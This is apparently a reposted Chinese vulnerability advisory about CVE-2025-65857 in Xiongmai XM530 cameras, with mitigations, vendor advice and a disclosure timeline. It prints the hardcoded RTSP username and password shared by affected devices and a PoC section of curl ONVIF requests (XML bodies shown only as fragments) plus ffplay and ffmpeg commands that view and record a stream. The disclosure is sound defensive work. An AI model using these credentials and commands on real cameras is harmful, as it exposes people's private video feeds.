文章总结： CVE-2025-65857是雄迈XM530系列摄像头的高危漏洞，其ONVIF服务的GetStreamUri接口会直接返回包含硬编码RTSP凭据的流媒体地址，结合身份验证绕过漏洞可导致攻击者无需交互即可远程观看实时监控画面。该漏洞影响雄迈代工的众多白牌设备，威胁用户隐私安全。建议立即进行网络隔离、禁用公网访问，并考虑更换设备。 综合评分： 85 文章分类： 漏洞分析,IoT安全,威胁情报,漏洞预警,安全建设

CVE-2025-65857：雄迈XM530摄像头硬编码凭据漏洞，数十万监控设备直接裸奔

幻泉之洲

2026年4月25日 10:10 北京

在小说阅读器读本章

去阅读

雄迈（Xiongmai）XM530系列网络摄像头被曝出重大安全漏洞。该设备ONVIF服务的一个特定接口会直接对外暴露包含硬编码RTSP账号密码的流媒体地址，结合配套的身份验证绕过漏洞，攻击者无需任何交互即可远程获取并观看摄像头的实时监控画面。由于雄迈是众多白牌摄像头的OEM供应商，此漏洞影响范围极广，用户隐私面临严重威胁。

漏洞概述：监控画面唾手可得

CVE-2025-65857是一个严重程度极高的信息泄露漏洞。简单说，攻击者向摄像头发起一个标准的ONVIF协议请求，摄像头就会乖乖返回一个流媒体播放地址。问题在于，这个地址里直接写死了访问流媒体需要的用户名和密码。

这意味着，任何能访问到这个摄像头网络的人，都能拿到钥匙（硬编码凭据），直接打开监控画面这道门。

• CVE编号：CVE-2025-65857
• 严重等级：严重
• CVSS 3.1评分：9.1
• CVSS向量：AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

这个漏洞的核心危害在于它的“傻瓜式”利用。攻击无需破解密码，无需用户点击，只要网络可达，直接发起请求就能拿到密码，再用这个密码去看直播。

技术原理：硬编码+裸奔传输

漏洞根植于摄像头的ONVIF媒体服务中。具体来说，是GetStreamUri这个ONVIF接口出了问题。

漏洞成因（CWE映射）

CWE-798：使用硬编码凭据

所有受影响设备都使用了相同的、无法修改的RTSP凭据：

• 用户名：wphd
• 密码：2MNswbQ5

更糟的是，即使用户修改了摄像头的后台管理密码，这对硬编码的RTSP凭据也毫无影响。它像一个后门，独立于所有用户设置之外。

CWE-522：凭据保护不足

这些凭据的传输方式也毫无安全性可言。它们以明文形式直接嵌入在HTTP响应返回的RTSP URI中：

rtsp://[摄像头IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream

没有加密，没有混淆，就这么直接送出去了。

攻击向量

单独看这个漏洞，攻击者还需要知道如何调用ONVIF接口。但结合另一个配套漏洞CVE-2025-65856（ONVIF身份验证绕过），情况就变得极其危险。

攻击链是这样的：

1. 利用CVE-2025-65856，无需任何账号密码即可访问ONVIF服务。
2. 调用存在漏洞的GetStreamUri接口。
3. 接口返回包含硬编码凭据的RTSP地址。
4. 使用该地址直接播放监控流。

整个过程是“零点击”的，用户毫无感知。

影响范围：你家的摄像头可能中招

这个漏洞影响特定型号的硬件和固件，但由于雄迈的商业模式，波及范围远超单一品牌。

• 供应商：

  杭州雄迈科技有限公司（Hangzhou Xiongmai Technology）

• 受影响产品：

  IP Camera XM530V200_X6-WEQ_8M

• 商业品牌：

  ANBIUX，以及由雄迈代工的数百个白牌/OEM品牌。你在电商平台买到的许多不知名品牌摄像头，很可能就是雄迈生产的。

• 受影响固件：

  V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06，以及所有V5.00.R02.*版本很可能都受影响。

• 漏洞组件：

  ONVIF媒体服务的GetStreamUri端点。

雄迈是全球主要的摄像头OEM供应商，其产品以各种品牌销往世界各地，广泛应用于家庭、商铺、工厂等安防场景。这意味着可能有数十万甚至百万台设备暴露在此风险之下。

实际危害场景：

• 家庭监控被陌生人实时窥视。
• 商铺、公司的安防画面可能被竞争对手获取。
• 成为大规模监控的跳板（凭据通用，可批量扫描利用）。
• 严重违反全球各地的隐私保护法规（如GDPR）。

漏洞复现：三步拿到监控流

以下是概念验证（PoC）步骤，展示了攻击者如何轻而易举地获取视频流。

步骤1：获取媒体配置（无需认证）

首先，利用身份验证绕过漏洞，获取摄像头的媒体配置信息（Profile）。

curl -X POST http://[CAMERA_IP]:8899/onvif/device_service   -H “Content-Type: application/soap+xml”   -d ‘<?xml version="1.0" encoding="utf-8"?>         ‘

响应中会包含可用的流配置令牌（Token），例如000（主码流）。

步骤2：请求流地址，泄露硬编码凭据

使用上一步得到的Token，请求获取对应的流媒体URI。

curl -X POST http://[CAMERA_IP]:8899/onvif/Media   -H “Content-Type: application/soap+xml”   -d ‘<?xml version="1.0" encoding="utf-8"?>                     RTP-Unicast                   RTSP                     000       ‘

关键来了！摄像头返回的响应中，会直接包含如下URI：

rtsp://192.168.1.100:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream

硬编码的用户名wphd和密码2MNswbQ5一览无余。

步骤3：直接观看或录制视频流

拿到URI后，使用任何支持RTSP的播放器（如VLC、ffplay）或工具（如ffmpeg）即可直接访问。

使用ffplay实时播放

ffplay “rtsp://192.168.1.100:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream”

使用ffmpeg录制

ffmpeg -i “rtsp://192.168.1.100:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream” -c copy 监控录像.mp4

至此，攻击者已经完全掌控了摄像头的实时画面。

修复建议与缓解措施

截至公开披露日，供应商尚未提供安全补丁。用户和网络管理员必须立即采取行动。

给用户的紧急缓解措施

• 网络隔离：

  立即将摄像头放置在独立的VLAN中，并严禁将其端口映射到公网（即不要做端口转发）。

• 防火墙规则：

  在网络上阻断所有从外部发往摄像头RTSP端口（默认554）的入站连接。

• 仅通过VPN访问：

  如果确实需要远程查看，务必通过VPN接入内网后再访问摄像头，杜绝直连。

• 监控RTSP连接：

  在网络设备上启用日志，监控异常的RTSP会话尝试。

• 考虑替换设备：

  考虑到雄迈产品过往糟糕的安全记录（见文末参考链接），强烈建议在条件允许时，更换为安全性更有保障的知名品牌设备。

给供应商的建议

• 从GetStreamUri接口的响应中移除硬编码凭据。
• 为RTSP流实现真正的、基于Digest的认证机制（RFC 2617）。
• 采用带有时效性的会话令牌，而非长期有效的静态凭据。
• 为每台设备生成唯一的RTSP访问凭据。
• 在RTSP服务上实施速率限制，防止流耗尽攻击。

时间线与厂商响应

• 2025年11月：

  研究人员在安全评估中发现该漏洞。

• 2025年12月16日：

  MITRE分配CVE编号CVE-2025-65857。

• 2025年12月17-18日：

  研究人员尝试通过官方邮箱[email protected]及备用邮箱联系厂商，均因服务器配置错误导致邮件投递失败。

• 2025年12月18日：

  公开披露。

厂商响应：无。官方安全联系渠道已失效。

参考资料

[1] https://github.com/LuisMirandaAcebedo/CVE-2025-65857

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：幻泉之洲 《CVE-2025-65857：雄迈XM530摄像头硬编码凭据漏洞，数十万监控设备直接裸奔》